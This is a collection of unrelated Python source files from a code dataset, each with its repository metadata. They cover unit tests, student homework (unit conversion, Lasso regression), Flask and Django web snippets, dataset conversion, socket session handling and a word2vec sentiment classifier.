self.assertEqual('100MB', self.container_object.mem_size)\n self.assertEqual('ubuntu', self.container_object.image)\n\n\nclass TestScalingObject(base.TestCase):\n def setUp(self):\n super(TestScalingObject, self).setUp()\n self.scaling_object = tosca_kube_object.ScalingObject(\n scaling_name='scalingname',\n min_replicas=1,\n max_replicas=3,\n scale_target_name=\"cp1\",\n target_cpu_utilization_percentage=\"40\"\n )\n\n def test_scaling_object(self):\n self.assertEqual('scalingname', self.scaling_object.scaling_name)\n self.assertEqual(1, self.scaling_object.min_replicas)\n self.assertEqual(3, self.scaling_object.max_replicas)\n self.assertEqual(\"cp1\", self.scaling_object.scale_target_name)\n self.assertEqual(\n \"40\", self.scaling_object.target_cpu_utilization_percentage)\n","repo_name":"openstack/tacker","sub_path":"tacker/tests/unit/vnfm/infra_drivers/kubernetes/test_tosca_kube_object.py","file_name":"test_tosca_kube_object.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"3"} +{"seq_id":"31321830711","text":"#Program Converts Feet to Inches. Performs program three times, then exits.\n#4 December 2017\n#CTI-110 M7T2_FeettoInches\n#Marie Hylton\n#\n\n#GLOBAL CONSTANT FOR THE NUMBER OF INCHES PER FOOT.\nINCHES_PER_FOOT=12\n\n#MAIN FUNCTION--WILL RUN THREE TIMES, THEN EXITS PROGRAM\ndef main():\n #GET A NUMBER OF FEET FROM THE USER:\n for x in range(1,4):\n feet=float(input(\"Enter the measurement in units of feet: \"))\n if feet>0:\n #CONVERT USER INPUT(FEET) INTO INCHES:\n print(feet, 'equals', format(feet_to_inches(feet),',.1f'), 'inches.')\n else:\n print(\"Enter a number greater than 0.\")\n print(\"Thank you for using the Feet to Inches Converter. Goodbye.\")\n\n#THE feet_to_inches FUNCTION CONVERTS FEET TO INCHES. \ndef feet_to_inches(feet):\n return feet*INCHES_PER_FOOT \n \nmain()\n","repo_name":"hyltonc4469/CTI-110","sub_path":"M7Tutorials_Hylton/M7T2FeettoInches_Hylton2.py","file_name":"M7T2FeettoInches_Hylton2.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31298645693","text":"from __future__ import division, absolute_import\n\nfrom incremental import Version\nfrom twisted.python.deprecate import deprecatedModuleAttribute\n\n\n# Known module-level attributes.\nDEPRECATED_ATTRIBUTE = 42\nANOTHER_ATTRIBUTE = 'hello'\n\n\nversion = Version('Twisted', 8, 0, 0)\nmessage = 'Oh noes!'\n\n\ndeprecatedModuleAttribute(\n version,\n message,\n __name__,\n 'DEPRECATED_ATTRIBUTE')\n","repo_name":"wistbean/learn_python3_spider","sub_path":"stackoverflow/venv/lib/python3.6/site-packages/twisted/python/test/deprecatedattributes.py","file_name":"deprecatedattributes.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":14022,"dataset":"github-code","pt":"3"} +{"seq_id":"34700546121","text":"from typing import Optional, Tuple\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom utils import problem\n\n\n@problem.tag(\"hw2-A\")\ndef step(\n X: np.ndarray, y: np.ndarray, weight: np.ndarray, bias: float, _lambda: float, eta: float\n) -> Tuple[np.ndarray, float]:\n \"\"\"Single step in ISTA algorithm.\n It should update every entry in weight, and then return an updated version of weight along with \n calculated bias on input weight!\n\n Args:\n X (np.ndarray): An (n x d) matrix, with n observations each with d features.\n y (np.ndarray): An (n, ) array, with n observations of targets.\n weight (np.ndarray): An (d,) array. Weight returned from the step before.\n bias (float): Bias returned from the step before.\n _lambda (float): Regularization constant. Determines when weight is updated to 0, and when \n to other values.\n eta (float): Step-size. Determines how far the ISTA iteration moves for each step.\n\n Returns:\n Tuple[np.ndarray, float]: Tuple with 2 entries. First represents updated weight vector, \n second represents bias.\n \n \"\"\" \n v = (X @ weight - y + bias) \n b = bias - 2*eta*v.sum()\n w = weight - 2*eta*(X.T @ v) \n #print(\"####W####:\", w, \"####2*eta*_lambda####:\", 2*eta*_lambda)\n\n # soft thresholding\n w[np.abs(w) <= 2*eta*_lambda] = 0 # must come first!\n w[w < -2*eta*_lambda] += 2*eta*_lambda\n w[w > 2*eta*_lambda] -= 2*eta*_lambda \n return w, b\n\n@problem.tag(\"hw2-A\")\ndef loss(\n X: np.ndarray, y: np.ndarray, weight: np.ndarray, bias: float, _lambda: float\n) -> float:\n \"\"\"L-1 (Lasso) regularized MSE loss.\n\n Args:\n X (np.ndarray): An (n x d) matrix, with n observations each with d features.\n y (np.ndarray): An (n, ) array, with n observations of targets.\n weight (np.ndarray): An (d,) array. Currently predicted weights.\n bias (float): Currently predicted bias.\n _lambda (float): Regularization constant. Should be used along with L1 norm of weight.\n\n Returns:\n float: value of the loss function\n \"\"\" \n n, d = X.shape \n\n v = (X @ weight - y + bias) \n return (v @ v) + _lambda * np.linalg.norm(weight, ord=1)\n\n\n@problem.tag(\"hw2-A\", start_line=5)\ndef train(\n X: np.ndarray,\n y: np.ndarray,\n _lambda: float = 0.01,\n eta: float = 0.001,\n convergence_delta: float = 1e-4,\n start_weight: np.ndarray = None,\n start_bias: float = None\n) -> Tuple[np.ndarray, float]:\n \"\"\"Trains a model and returns predicted weight and bias.\n\n Args:\n X (np.ndarray): An (n x d) matrix, with n observations each with d features.\n y (np.ndarray): An (n, ) array, with n observations of targets.\n _lambda (float): Regularization constant. Should be used for both step and loss.\n eta (float): Step size.\n convergence_delta (float, optional): Defines when to stop training algorithm.\n The smaller the value the longer algorithm will train.\n Defaults to 1e-4.\n start_weight (np.ndarray, optional): Weight for hot-starting model.\n If None, defaults to array of zeros. Defaults to None.\n It can be useful when testing for multiple values of lambda.\n start_bias (np.ndarray, optional): Bias for hot-starting model.\n If None, defaults to zero. Defaults to None.\n It can be useful when testing for multiple values of lambda.\n\n Returns:\n Tuple[np.ndarray, float]: A tuple with first item being array of shape (d,) representing \n predicted weights, and second item being a float representing the bias.\n\n Note:\n - You will have to keep an old copy of weights for convergence criterion function.\n Please use `np.copy(...)` function, since numpy might sometimes copy by reference,\n instead of by value leading to bugs.\n - You might wonder why do we also return bias here, if we don't need it for this problem.\n There are two reasons for it:\n - Model is fully specified only with bias and weight.\n Otherwise you would not be able to make predictions.\n Training function that does not return a fully usable model is just weird.\n - You will use bias in next problem.\n \"\"\"\n if start_weight is None:\n start_weight = np.zeros(X.shape[1])\n start_bias = 0\n old_w: Optional[np.ndarray] = None\n old_b: Optional[np.ndarray] = None\n w = start_weight\n b = start_bias\n while old_w is None or not convergence_criterion(w, old_w, b, old_b, convergence_delta):\n old_w = np.copy(w)\n old_b = np.copy(b)\n w, b = step(X, y, w, b, _lambda, eta)\n max_delta = np.abs(np.hstack((w - old_w, b - old_b))).max()\n return w, b\n\n\n@problem.tag(\"hw2-A\")\ndef convergence_criterion(\n weight: np.ndarray, old_w: np.ndarray, bias: float, old_b: float, convergence_delta: float\n) -> bool:\n \"\"\"Function determining whether weight has converged or not.\n It should calculate the maximum absolute change between weight and old_w vector, and compare it \n to convergence delta.\n\n Args:\n weight (np.ndarray): Weight from current iteration of coordinate gradient descent.\n old_w (np.ndarray): Weight from previous iteration of coordinate gradient descent.\n convergence_delta (float): Aggressiveness of the check.\n\n Returns:\n bool: False, if weight has not converged yet. True otherwise.\n \"\"\" \n return np.abs(weight - old_w).max() <= convergence_delta\n\n\n@problem.tag(\"hw2-A\")\ndef main():\n \"\"\"\n Use all of the functions above to make plots.\n \"\"\"\n import numpy as np\n\n n = 500 # number of data points\n d = 1000 # dimension of the input features\n k = 100 # number of non-zero true weights/number of relevant features\n w_true = np.hstack((np.linspace(1/k, 1, num=k), np.zeros(d-k))) \n\n rng = np.random.default_rng()\n X = rng.normal(size=(n, d)) # no need for standardization\n e = rng.normal(size=n)\n y = X @ w_true + e\n\n _lambda = 2*np.abs(X.T @ (y - y.mean())).max()\n num_non_zero = 0\n lambdas, num_non_zeros = [], []\n fdr, tpr = [], []\n while num_non_zero < d:\n w, b = train(X, y, _lambda, eta=2e-5, convergence_delta=1e-4) \n num_non_zero = np.count_nonzero(w)\n lambdas.append(_lambda)\n num_non_zeros.append(num_non_zero)\n\n np.count_nonzero(w[0:k])\n if num_non_zero == 0:\n fdr.append(0)\n tpr.append(0)\n else:\n fdr.append(np.count_nonzero(w[k:d]) / num_non_zero)\n tpr.append(np.count_nonzero(w[0:k]) / k)\n _lambda *= 0.5\n\n plt.tight_layout()\n plt.plot(lambdas, num_non_zeros)\n plt.xscale(\"log\")\n plt.xlabel(\"$\\lambda$\")\n plt.ylabel(\"Number of non-zero weights\")\n plt.title(\"Lasso Regularization\")\n plt.show()\n\n plt.plot(fdr, tpr)\n plt.xlabel(\"FDR\")\n plt.ylabel(\"TPR\")\n plt.title(\"True Positive Rate vs False Discovery Rate\")\n plt.show()\n\ndef main_test():\n \"\"\"\n Use all of the functions above to make plots.\n \"\"\"\n import numpy as np\n\n n = 500 # number of data points\n d = 1000 # dimension of the input features\n k = 100 # number of non-zero true weights/number of relevant features\n sigma = 1\n _lambda = 200\n\n w_true = np.hstack((np.linspace(1/k, 1, num=k), np.zeros(d-k))) \n\n rng = np.random.default_rng(seed=42)\n \n \n\n # xpoints = np.linspace(np.max(X), np.min(X), 100).reshape(-1, 1)\n\n # fig, axs = plt.subplots(2, 3)\n # dis = (0, 1, 2, 3, 4, 5)\n # for ax, di in zip(axs.flat, dis):\n # ax.plot(X[:,di], y, 'or', label=f\"raw data[{di}]\")\n # ax.plot(X[:,di], y_opt, label=f\"de-noised data[{di}]\")\n # ax.plot(X[:,di], X[:,di]*w_true[di], label=f\"contribution to y\")\n # ax.legend()\n # ax.set_title(f\"w_true[{di}] = {w_true[di]:.2f}\")\n # ax.set(xlabel='X', ylabel='Y')\n # plt.show()\n\n # plt.plot(X[:,0], y, 'or', label=\"raw data[0]\")\n # plt.plot(X[:,0], y_opt, label=\"de-noised data[0]\")\n # plt.legend()\n # plt.show()\n # plt.plot(X[:,1], y, label=\"raw data[1]\")\n # plt.plot(X[:,1], y_opt, label=\"de-noised data[1]\")\n # plt.show()\n\n # X = rng.uniform(0, 10, size=(n, d))\n # mean = np.mean(X, axis=0, keepdims=True)\n # std = np.std(X, axis=0, keepdims=True)\n # std[std == 0] = 1 # avoid division by zero, just in case\n # X = (X - mean) / std\n\n X = rng.normal(size=(n, d))\n e = rng.normal(scale=sigma, size=n)\n y = X @ w_true + e\n y_opt = X @ w_true\n w, b = train(X, y, _lambda, eta=0.0001, convergence_delta=0.01)\n print(\"lol\") \n y_pred = X @ w + b \n\n \n fig, (ax1, ax2, ax3) = plt.subplots(1, 3)\n ax1.plot(y_opt, y_pred, '.b')\n ax1.plot((y_pred.min(), y_pred.max()), (y_pred.min(), y_pred.max()), '--r')\n ax1.set_title(\"predictions vs de-noised data\")\n ax2.plot(y, y_pred, '.b')\n ax2.plot((y_pred.min(), y_pred.max()), (y_pred.min(), y_pred.max()), '--r')\n ax2.set_title(\"predictions vs raw data\")\n ax3.plot(w_true, w, '.b', alpha=0.2)\n ax3.plot((w.min(), w.max()), (w.min(), w.max()), '--r')\n ax3.set_title(\"predicted w vs true w\")\n print(f\"minimum loss={loss(X, y, w_true, 0.0, _lambda):.2f}, model loss={loss(X, y, w, b, _lambda):.2f}\")\n plt.legend()\n plt.show()\n\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ejh3/LearningMachineLearning","sub_path":"[3]lasso/ISTA.py","file_name":"ISTA.py","file_ext":"py","file_size_in_byte":9475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42588807030","text":"from flask import Flask, request\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/save-file', methods=['POST'])\ndef save_file():\n # Get the file from the request\n file = request.files['file']\n\n # Save the file to a directory\n file.save(file.filename)\n\n return 'File saved successfully', 200\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=3000)\n","repo_name":"lorenz234/PromptToChain","sub_path":"backend/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5044371964","text":"# handles all the non-admin / basic user functionalities used by employees of the company\r\nfrom flask import Blueprint, render_template, request, flash, redirect, url_for\r\nfrom flask_login import login_user, login_required, current_user, logout_user\r\nfrom .models import SessionForm, Employee, Student\r\nfrom . import db\r\naccount = Blueprint('account', __name__)\r\n\r\n# automatically renders the homepage when user is logged in\r\n@account.route('/account/home')\r\n@login_required\r\ndef home():\r\n return render_template('home-page.html', user=current_user)\r\n\r\n# gives 'logged out' status to the user and redirects to login page when user clicks on 'Log Out' button\r\n@account.route('/account/logout')\r\n@login_required\r\ndef logout():\r\n logout_user()\r\n return redirect(url_for('auth.login'))\r\n\r\n# renders the learning session fill out page when user clicks \"Fill Out Session\"\r\n@account.route('/account/fill-out-session', methods=['GET','POST'])\r\n@login_required\r\ndef fill_out_session():\r\n # if user submits session information, then check conditions to make sure info meets all conditions\r\n if request.method == 'POST':\r\n student_name = request.form.get(\"student-name\")\r\n student_id = \"N/A\"\r\n for student in Student.query.all():\r\n if student.name == student_name:\r\n student_id = student.id\r\n subject_name = request.form.get(\"subject-name\")\r\n time_length = request.form.get(\"time-length\")\r\n prof_rating = request.form.get(\"proficiency-level\")\r\n description = request.form.get(\"description\")\r\n employee_id = current_user.id\r\n if student_name == \"select-name\":\r\n flash('Please select a student name.', category='error')\r\n elif len(subject_name) < 3:\r\n flash('Subject name must be more than two characters.', category='error')\r\n elif len(time_length) < 1:\r\n flash('Please enter a proficiency rating.', category='error')\r\n elif int(time_length) < 1:\r\n flash('Time length must be more than one minutes.', category='error')\r\n elif len(prof_rating) < 1:\r\n flash('Please enter a proficiency rating.', category='error')\r\n elif (int(prof_rating) < 1) or (int(prof_rating) > 5):\r\n flash('Proficiency rating must be between digits 1-5', category='error')\r\n elif len(description) < 11:\r\n flash('Description must be more than 10 characters.', category='error')\r\n else:\r\n new_session = SessionForm(student_name=student_name, student_id=student_id, subject_name=subject_name,\r\n description=description, proficiency_level=int(prof_rating), time_length=int(time_length), employee_id=current_user.id)\r\n db.session.add(new_session)\r\n db.session.commit()\r\n flash('Session successfully submitted!', category='success')\r\n return render_template('session-fillout-page.html', user=current_user, students=Student.query.all())\r\n\r\n# renders the session data page which provides user all sessions that the user has filled out\r\n@account.route('/account/past-session-data')\r\n@login_required\r\ndef session_data():\r\n return render_template('session-data.html', user=current_user)\r\n\r\n# allows user to update their account information\r\n@account.route('/account/account-settings', methods=['GET','POST'])\r\n@login_required\r\ndef account_settings():\r\n # if user submits new account information, then check conditions to make sure info meets all conditions\r\n if request.method == 'POST':\r\n username = request.form.get(\"username\")\r\n email = request.form.get(\"email\")\r\n first_name = request.form.get(\"first-name\")\r\n last_name = request.form.get(\"last-name\")\r\n if len(username) < 4:\r\n flash('Username must be greater than 3 characters.', category='error')\r\n elif len(email) < 4:\r\n flash('Email must be greater than 3 characters.', category='error')\r\n elif len(first_name) < 2:\r\n flash('First name must be greater than 1 character.', category='error')\r\n elif len(last_name) < 2:\r\n flash('Last name must be greater than 1 character.', category='error')\r\n else:\r\n # changes the account attributes of the current user within the database \r\n current_user.username = username\r\n current_user.email = email\r\n current_user.first_name = first_name\r\n current_user.last_name = last_name\r\n db.session.commit()\r\n return render_template('account-settings.html', user=current_user)\r\n\r\n","repo_name":"zainali1234/tutor-employee-management-webapp","sub_path":"account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41865041","text":"import sys\nsys.path.append('../')\nfrom pathlib import Path\nimport cv2\nfrom core.utils import *\nimport multiprocessing as mp\n\n\ndef convert(src, dst):\n img = cv2.imread(src, 0)\n img = CS.id2trainId[img.ravel()].reshape(img.shape)\n cv2.imwrite(dst, img)\n\ndef main():\n root = '../data/cityscapes/gtFine/train'\n dst_root = '../data/cityscapes/gtFine_trainIds/train'\n\n files = [x.resolve() for x in Path(root).rglob(\"*_labelIds.png\")]\n dst_root = Path(dst_root)\n dst_root.mkdir(parents=True, exist_ok=True)\n\n tasks = []\n for filename in files:\n tasks.append([str(filename), str(dst_root / filename.name.replace('_labelIds.png', '_trainIds.png'))])\n\n pool = mp.Pool(16)\n jobs = [pool.apply_async(convert, task) for task in tasks]\n [job.get() for job in jobs]\n\nmain()\n","repo_name":"js-fan/PntWSSS","sub_path":"tools/convert_cs_dataset.py","file_name":"convert_cs_dataset.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34178497659","text":"import asyncio\nimport time\nimport traceback\nfrom koala.koala_typing import *\nfrom koala.network.socket_session import SocketSession, SocketSessionManager\nfrom koala.logger import logger\n\n\n_session_manager = SocketSessionManager()\n_last_process_message_time = time.time()\n_message_handler: Optional[Callable[[SocketSession, Type, object], Coroutine]] = None\n_socket_close_handler: Optional[Callable[[SocketSession], None]] = None\n\n\ndef _process_income_socket(session: SocketSession):\n codec_id = session.codec.codec_id\n _session_manager.add_session(session)\n logger.debug(\n \"SocketSessionManager, SessionID:%d added, CodecID:%d\"\n % (session.session_id, codec_id)\n )\n return\n\n\ndef _process_close_socket(session_id: int):\n session = _session_manager.get_session(session_id)\n try:\n if session and _socket_close_handler:\n _socket_close_handler(session)\n except Exception as e:\n logger.error(\n \"SocketSessionManager, Before Remove SessionID:%d, Exception:%s\"\n % (session_id, e)\n )\n pass\n if session:\n _session_manager.remove_session(session_id)\n logger.debug(\"SocketSessionManager, SessionID:%d removed\" % session_id)\n return\n\n\nasync def _process_socket_message(session: SocketSession, clz: Type, msg: object):\n try:\n if _message_handler:\n await _message_handler(session, clz, msg)\n else:\n logger.error(\"process_socket_message, user message handler is None\")\n except Exception as e:\n logger.error(\n \"process_socket_message, SessionID:%d Exception:%s, StackTrace:%s\"\n % (session.session_id, e, traceback.format_exc())\n )\n\n\ndef _process_connect_success(session: SocketSession):\n if session:\n session.heart_beat(_last_process_message_time)\n logger.info(\n \"SocketSessionManager, SessionID:%d, ConnectSuccess\" % session.session_id\n )\n else:\n logger.error(\n \"SocketSessionManager, SessionID:%d not found\" % session.session_id\n )\n\n\ndef register_message_handler(\n handler: Callable[[SocketSession, Type, object], Coroutine]\n):\n global _message_handler\n _message_handler = handler\n pass\n\n\ndef register_socket_close_handler(handler: Callable[[SocketSession], None]):\n global _socket_close_handler\n _socket_close_handler = handler\n pass\n\n\nasync def update_message_time():\n global _last_process_message_time\n while True:\n await asyncio.sleep(1.0)\n _last_process_message_time = time.time()\n","repo_name":"egmkang/koala","sub_path":"koala/network/event_handler.py","file_name":"event_handler.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"3"} +{"seq_id":"22631914839","text":"from .views import devices, track, about_us, code_circuit, detailed, test, track_map, admin_login, logout_view\nfrom django.urls import path\n\nurlpatterns = [\n path('devices/', devices, name = 'devices'),\n path('logout/', logout_view, name = 'logout'),\n path('track/', track, name = 'track'),\n path('detailed/', detailed, name = 'detailed'),\n path('test/', test, name = 'test'),\n path('about_us/', about_us, name = 'about_us'),\n path('track_map/', track_map, name = 'track_map'),\n path('admin_login/', admin_login, name = 'admin_login'),\n path('code_circuit/', code_circuit, name = 'code_circuit')\n]","repo_name":"zIlgar/Caspian_Rescuer","sub_path":"telemetry_project/telemetry_project/app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"6545488876","text":"from typing import TYPE_CHECKING\n\nfrom .equine import Equine, EquineOutput\nfrom .equine_gp import EquineGP\nfrom .equine_protonet import CovType, EquineProtonet\nfrom .utils import (\n brier_score,\n brier_skill_score,\n expected_calibration_error,\n generate_episode,\n generate_model_metrics,\n generate_model_summary,\n generate_support,\n generate_train_summary,\n)\n\nif not TYPE_CHECKING: # pragma: no cover\n try:\n from ._version import version as __version__\n except ImportError:\n __version__ = \"unknown version\"\nelse: # pragma: no cover\n __version__: str\n\n__all__ = [\n \"Equine\",\n \"EquineOutput\",\n \"EquineGP\",\n \"EquineProtonet\",\n \"CovType\",\n \"brier_score\",\n \"brier_skill_score\",\n \"expected_calibration_error\",\n \"generate_support\",\n \"generate_episode\",\n \"generate_model_metrics\",\n \"generate_train_summary\",\n \"generate_model_summary\",\n]\n","repo_name":"mit-ll-responsible-ai/equine","sub_path":"src/equine/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"36467851824","text":"'''\nCUDA_VISIBLE_DEVICES=0 python main.py --modality video \\\n --extract-feats \\\n --config-path ./configs/lrw_resnet18_dctcn.json \\\n --model-path ./models/lrw_resnet18_dctcn_video.pth.tar \\\n --mouth-patch-path mouth_vid.npz \\\n --mouth-embedding-out-path embeddings/emb_out.npz\n\n'''\n\n\n'''\nUsage: This bitty will combine a bunch of npzs into list of objects to be used for frozen pretrained\n\n'''\nimport gzip\nimport pickle\nimport torch\nimport numpy as np\nimport argparse\nimport os\nimport subprocess\nimport fnmatch\nfrom tqdm import tqdm\n\ndef find_files_with_extension(directory, extension):\n file_paths = []\n \n for root, dirs, files in os.walk(directory):\n for file in fnmatch.filter(files, f'*{extension}'):\n file_paths.append(os.path.join(root, file))\n \n return file_paths\n\n\ndef convert_images_to_embeddings(path_to_npzs):\n for path_to_npz in tqdm(path_to_npzs):\n # Execute the embedding command\n embedding_output_path = os.path.splitext(path_to_npz)[0] + \"_emb.npz\"\n\n subprocess.run(['python3', './LipEmbeddings/main.py', '--modality', 'video', '--extract-feats',\n '--config-path', './LipEmbeddings/configs/lrw_resnet18_dctcn.json',\n '--model-path', './LipEmbeddings/models/lrw_resnet18_dctcn_video.pth.tar',\n '--mouth-patch-path', path_to_npz,\n '--mouth-embedding-out-path', embedding_output_path])\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Video to Frames Converter')\n parser.add_argument(\"-d\", '--data-dir', default=None ,type=str, help='Path to the data directory')\n args = parser.parse_args()\n \n # Get all NPZs\n path_to_npzs = find_files_with_extension(args.data_dir, \"npz\")\n\n convert_images_to_embeddings(path_to_npzs)\n\nif __name__ == \"__main__\":\n main()","repo_name":"schefferac2020/LipReading","sub_path":"getty_embeddy.py","file_name":"getty_embeddy.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"27368864876","text":"import torch\nfrom gemini_torch.utils import ImgToEmbeddings\n\n# Example usage\nnum_patches = 16\npatch_size = 16\ntransformer_dim = 512\nimg_channels = 3\nseq_len = 50000\nreduced_dim = 256 # Reduced dimension after dimensionality reduction\n\nmodel = ImgToEmbeddings(\n num_patches, patch_size, transformer_dim, img_channels, seq_len, reduced_dim\n)\n\n# Dummy image input [BATCH, CHANNELS, HEIGHT, WIDTH]\ndummy_img = torch.randn(1, 3, 64, 64) # Batch size of 1, 64x64 RGB image\n\n# Forward pass\nseq_space_output = model(dummy_img)\nprint(seq_space_output.shape) # Expected shape: [1, 50000, 256]\n","repo_name":"kyegomez/Gemini","sub_path":"tests/test_img_to_transformer.py","file_name":"test_img_to_transformer.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"28884284527","text":"# -*- coding: utf-8 -*-\n# -*- coding: -*-\n\nimport numpy as np\nimport sys\nimport re\nimport codecs\nimport os\nimport jieba\nimport gensim, logging\nfrom gensim.models import word2vec\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.externals import joblib\nfrom sklearn.preprocessing import scale\nfrom sklearn.svm import SVC\nfrom sklearn.decomposition import PCA\nfrom scipy import stats\nfrom sklearn.cross_validation import train_test_split\n# from keras.models import Sequential\n# from keras.layers import Dense, Dropout, Activation\n# from keras.optimizers import SGD\nfrom sklearn.metrics import f1_score\n# from bayes_opt import BayesianOptimization as BO\nfrom sklearn.metrics import roc_curve\nimport matplotlib.pyplot as plt\nimport sklearn\nfrom sklearn.metrics import roc_auc_score as auc\nfrom sklearn.metrics import accuracy_score as acc\n\n\ndef parseSent(sentence):\n seg_list = jieba.cut(sentence)\n output = ''.join(list(seg_list)) # use space to join them\n return output\n\n\ndef sent2word(sentence):\n \"\"\"\n Segment a sentence to words\n Delete stopwords\n \"\"\"\n segResult = []\n segList = jieba.cut(''.join(re.findall(u'[\\u4e00-\\u9fff]+', sentence)))\n for w in segList:\n segResult.append(w)\n stopwords = readLines('/home/nyh/work/workspace/dataanalysis/dmlib/data/nlp/stopWords.txt')\n newSent = []\n stopwords_list = []\n for word in segResult:\n if word in stopwords:\n # print \"stopword: %s\" % word\n continue\n else:\n newSent.append(word)\n # output = ' '.join(list(newSent))\n return newSent\n\n\ndef eachFile(filepath):\n pathDir = os.listdir(filepath)\n child = []\n for allDir in pathDir:\n child.append(os.path.join('%s/%s' % (filepath, allDir)))\n return child\n\n\ndef readLines(filename):\n fopen = open(filename, 'r')\n data = []\n for x in fopen.readlines():\n if x.strip() != '':\n data.append(x.strip())\n fopen.close()\n return data\n\n\ndef readFile(filename):\n data = []\n for x in filename:\n fopen = open(x, 'r')\n for eachLine in fopen:\n if eachLine.strip() != '':\n data.append(eachLine.strip())\n fopen.close()\n return data\n\n\ndef getWordVecs(wordList):\n vecs = []\n for word in wordList:\n word = word.replace('\\n', '')\n try:\n vecs.append(model[word])\n except KeyError:\n continue\n return np.array(vecs, dtype = 'float')\n\n\ndef buildVecs(filename):\n posInput = []\n with open(filename, \"r\", encoding = \"utf-8\") as txtfile:\n for lines in txtfile:\n lines = lines.split('\\n')\n if lines[0] == \"\\r\" or lines[0] == \"\\r\\n\" or lines[0] == \"\\r\\r\":\n pass\n else:\n\n for line in lines:\n line = list(jieba.cut(line))\n\n resultList = getWordVecs(line)\n\n # for each sentence, the mean vector of all its vectors is used to represent this sentence\n if len(resultList) != 0:\n resultArray = sum(np.array(resultList)) / len(resultList)\n posInput.append(resultArray)\n return posInput\n\n\n# load word2vec model\n# 训练模型输出模型\nos.chdir(\"/home/nyh/work/workspace/dataanalysis/dmlib/\")\nfilepwd = eachFile(\"/home/nyh/work/workspace/dataanalysis/dmlib/data/nlp/test\")\nsentences = []\nfor x in filepwd:\n data = readLines(x)\n for line in data:\n sentences.extend(sent2word(line))\n # sentences.append(data[0])\n\nmodel = gensim.models.Word2Vec(sentences, min_count=0, size = 500)\n# outp1 = 'corpus.model.bin'\n# model.save(outp1)\n\nfilepwd_pos = eachFile('../data/pos')\nfilepwd_neg = eachFile('../data/neg')\n\npos_number = 0\nneg_number = 0\nposInput = []\nnegInput = []\nfor pos in filepwd_pos:\n pos_buildVecs = buildVecs(pos)\n posInput.extend(pos_buildVecs)\n pos_number += 1\n if pos_number == 100:\n break\nfor neg in filepwd_neg:\n neg_buildVecs = buildVecs(neg)\n negInput.extend(neg_buildVecs)\n neg_number += 1\n if neg_number == 100:\n break\n\ny = np.concatenate((np.ones(len(posInput)), np.zeros(len(negInput))))\n\nX = posInput[:]\n\nfor neg in negInput:\n X.append(neg)\n\nX = np.array(X)\n\nX = scale(X)\n\nX_reduced = PCA(n_components=100).fit_transform(X)\n\n# X_reduced_train,X_reduced_test, y_reduced_train, y_reduced_test =train_test_split(X_reduced,y)\n\n\nX_reduced_train, X_reduced_test, y_reduced_train, y_reduced_test = train_test_split(X_reduced, y, test_size=0.4,\n random_state=1)\n\n\"\"\"\nSVM (RBF)\n using training data with 100 dimensions\n\"\"\"\n\nclf = SVC(C=2, probability=True)\nclf.fit(X_reduced_train, y_reduced_train)\nprint\n'Test Accuracy: %.2f' % clf.score(X_reduced_test, y_reduced_test)\n\npred_probas = clf.predict_proba(X_reduced_test)[:, 1]\n\n# print \"KS value: %f\" % KSmetric(y_reduced_test, pred_probas)[0]\n\n# plot ROC curve# AUC = 0.92# KS = 0.7\n\n\n# 输出相关结果 以及绘图\nprint(\"test:\")\nprint(clf.predict(X_reduced_test))\nprint(\"value:\")\nprint(y_reduced_test)\n\ntest_value = clf.predict(X_reduced_test)\n\nindex = []\nfor x in range(0, len(test_value)):\n index.append(x + 1)\n\ntest_value_1 = 0\ntest_value_0 = 0\nfor test_value_data in test_value:\n if test_value_data == 1:\n test_value_1 += 1\n else:\n test_value_0 += 1\n\ny_reduced_test_1 = 0\ny_reduced_test_0 = 0\nfor y_reduced_test_data in y_reduced_test:\n if y_reduced_test_data == 1:\n y_reduced_test_1 += 1\n else:\n y_reduced_test_0 += 1\n\ntest_value_label = 'test pos: ' + str(test_value_1) + ' neg: ' + str(test_value_0)\ny_reduced_test_label = 'value pos: ' + str(y_reduced_test_1) + ' neg: ' + str(y_reduced_test_0)\n\nplt.plot(index, test_value, 'ro', label=test_value_label)\nplt.plot(index, y_reduced_test, 'b.', label=y_reduced_test_label)\nplt.xlim([0, len(test_value)])\nplt.ylim([-2, 2])\nplt.legend(loc='lower right')\nplt.show()\n\nfpr, tpr, _ = roc_curve(y_reduced_test, pred_probas)\nroc_auc = sklearn.metrics.auc(fpr, tpr)\nplt.plot(fpr, tpr, label='roc_auc = %.2f' % roc_auc)\nplt.plot([0, 1], [0, 1], 'k--')\nplt.xlim([0.0, 1.0])\nplt.ylim([0.0, 1.05])\nplt.legend(loc='lower 